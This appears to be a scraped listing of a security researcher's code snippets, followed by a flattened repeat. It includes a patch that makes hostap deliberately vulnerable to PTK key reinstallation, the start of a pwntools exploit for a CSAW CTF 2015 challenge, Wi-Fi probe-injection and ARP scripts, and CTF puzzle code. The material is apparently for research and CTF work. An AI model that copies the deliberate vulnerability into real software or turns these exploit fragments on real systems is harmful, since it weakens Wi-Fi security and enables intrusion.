Mathy Vanhoef vanhoefm

## 0001-Make-hostap-vulnerable-to-PTK-key-reinstallation.patch
From b2393237de31be1799cb9026e30a5bf7b611f6e7 Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <Mathy.Vanhoef@kuleuven.be>
Date: Fri, 17 Feb 2023 21:38:06 +0100
Subject: [PATCH] Make hostap vulnerable to PTK key reinstallation

Apply this patch to hostap_2_10 to make it vulnerable to PTK key
reinstallations.
---
 src/rsn_supp/wpa.c | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)

## ath9khtc.patch
diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_main.c b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
index d441045..84359c3 100644
--- a/drivers/net/wireless/ath/ath9k/htc_drv_main.c
+++ b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
@@ -147,21 +147,26 @@ static void ath9k_htc_bssid_iter(void *data, u8 *mac, struct ieee80211_vif *vif)
 	struct ath9k_vif_iter_data *iter_data = data;
 	int i;

-	for (i = 0; i < ETH_ALEN; i++)
-		iter_data->mask[i] &= ~(iter_data->hw_macaddr[i] ^ mac[i]);

## findmac.py
#!/usr/bin/python
from scapy.all import *
import random

# number of times to inject probe for one bit (combat packet loss)
ATTEMPTS_PER_BIT = 3
# time to wait for ACK in seconds
SNIFFTIME = 0.1


## reset_router.py
#!/usr/bin/env python3
from selenium.webdriver import Firefox
from selenium.webdriver.firefox.options import Options
import subprocess, time

def reset_router(browser):
	browser.execute_script('javascript:CheckHTMLStatus("System");')
	time.sleep(0.13)
	browser.execute_script('javascript:SetFactory_Default();')
	time.sleep(0.01)

## wait_router.py
#!/usr/bin/env python3
from scapy.all import *

# MAC address of our own interface
MYMACADDR = "11:22:33:44:55:66"

def wait_router(iface, ip):
	s = L2Socket(type=ETH_P_ALL, iface=iface)
	arp = Ether(dst="ff:ff:ff:ff:ff:ff", src=MYMACADDR)
	arp = arp/ARP(hwsrc=MYMACADDR, pdst=ip, psrc="192.168.0.100")

## comp128.c
/** Comp128 version 2 and 3 overview by Mathy Vanhoef (based on other contributions mentioned inline) */
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <time.h>


static uint8_t table0[] = {
	197, 235,  60, 151,  98,  96,   3, 100, 248, 118,  42, 117, 172, 211, 181, 203,

## csaw-ctf-2015_exploit-500.py
#!/usr/bin/env python2
from pwn import *


# Stack layout of vulnerable functions:
#
#	[   buffer of some length  ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
#

payload  = pack(0x08048740)			# send function -> send(socket, &password, 0x100, 0)

## findseed
#include <stdio.h>
#include <stdint.h>

int is_correct(uint32_t seed) {
	uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
	for (uint32_t i = 0, x = seed; i < 5; ++i) {
		x = (214013 * x + 2531011) & 0xFFFFFF;
		if (hexkey[i] != (x >> 16)) return 0;
	}
	return 1;

## findseed
#include <stdio.h>
#include <stdint.h>

int is_correct(uint32_t seed) {
	uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
	for (uint32_t i = 0, x = seed; i < 5; ++i) {
		x = (214013 * x + 2531011) & 0xFFFFFF;
		printf("%X\n", x);
		if (hexkey[i] != (x >> 16)) return 0;
	}

## good_crypto
function validate() {
	var x = document.forms["formxx"]["pwz"].value;
	if (!x.match(/^[A-Za-z]+$/))
		return false;

	if (!sha1(x).match(/^ff7b948953ac/))
		return false;

	alert("Flag: " + x);
	return true;
	From b2393237de31be1799cb9026e30a5bf7b611f6e7 Mon Sep 17 00:00:00 2001
	From: Mathy Vanhoef <Mathy.Vanhoef@kuleuven.be>
	Date: Fri, 17 Feb 2023 21:38:06 +0100
	Subject: [PATCH] Make hostap vulnerable to PTK key reinstallation

	Apply this patch to hostap_2_10 to make it vulnerable to PTK key
	reinstallations.
	---
	src/rsn_supp/wpa.c \| 23 +++++++++++++++++++++++
	1 file changed, 23 insertions(+)
	diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_main.c b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
	index d441045..84359c3 100644
	--- a/drivers/net/wireless/ath/ath9k/htc_drv_main.c
	+++ b/drivers/net/wireless/ath/ath9k/htc_drv_main.c
	@@ -147,21 +147,26 @@ static void ath9k_htc_bssid_iter(void data, u8 mac, struct ieee80211_vif *vif)
	struct ath9k_vif_iter_data *iter_data = data;
	int i;

	- for (i = 0; i < ETH_ALEN; i++)
	- iter_data->mask[i] &= ~(iter_data->hw_macaddr[i] ^ mac[i]);
	#!/usr/bin/python
	from scapy.all import *
	import random

	# number of times to inject probe for one bit (combat packet loss)
	ATTEMPTS_PER_BIT = 3
	# time to wait for ACK in seconds
	SNIFFTIME = 0.1
	#!/usr/bin/env python3
	from selenium.webdriver import Firefox
	from selenium.webdriver.firefox.options import Options
	import subprocess, time

	def reset_router(browser):
	browser.execute_script('javascript:CheckHTMLStatus("System");')
	time.sleep(0.13)
	browser.execute_script('javascript:SetFactory_Default();')
	time.sleep(0.01)
	#!/usr/bin/env python3
	from scapy.all import *

	# MAC address of our own interface
	MYMACADDR = "11:22:33:44:55:66"

	def wait_router(iface, ip):
	s = L2Socket(type=ETH_P_ALL, iface=iface)
	arp = Ether(dst="ff:ff:ff:ff:ff:ff", src=MYMACADDR)
	arp = arp/ARP(hwsrc=MYMACADDR, pdst=ip, psrc="192.168.0.100")
	/** Comp128 version 2 and 3 overview by Mathy Vanhoef (based on other contributions mentioned inline) */
	#include <string.h>
	#include <stdio.h>
	#include <stdint.h>
	#include <stdlib.h>
	#include <time.h>


	static uint8_t table0[] = {
	197, 235, 60, 151, 98, 96, 3, 100, 248, 118, 42, 117, 172, 211, 181, 203,
	#!/usr/bin/env python2
	from pwn import *


	# Stack layout of vulnerable functions:
	#
	# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
	#

	payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
	#include <stdio.h>
	#include <stdint.h>

	int is_correct(uint32_t seed) {
	uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
	for (uint32_t i = 0, x = seed; i < 5; ++i) {
	x = (214013 * x + 2531011) & 0xFFFFFF;
	if (hexkey[i] != (x >> 16)) return 0;
	}
	return 1;
	function validate() {
	var x = document.forms["formxx"]["pwz"].value;
	if (!x.match(/^[A-Za-z]+$/))
	return false;

	if (!sha1(x).match(/^ff7b948953ac/))
	return false;

	alert("Flag: " + x);
	return true;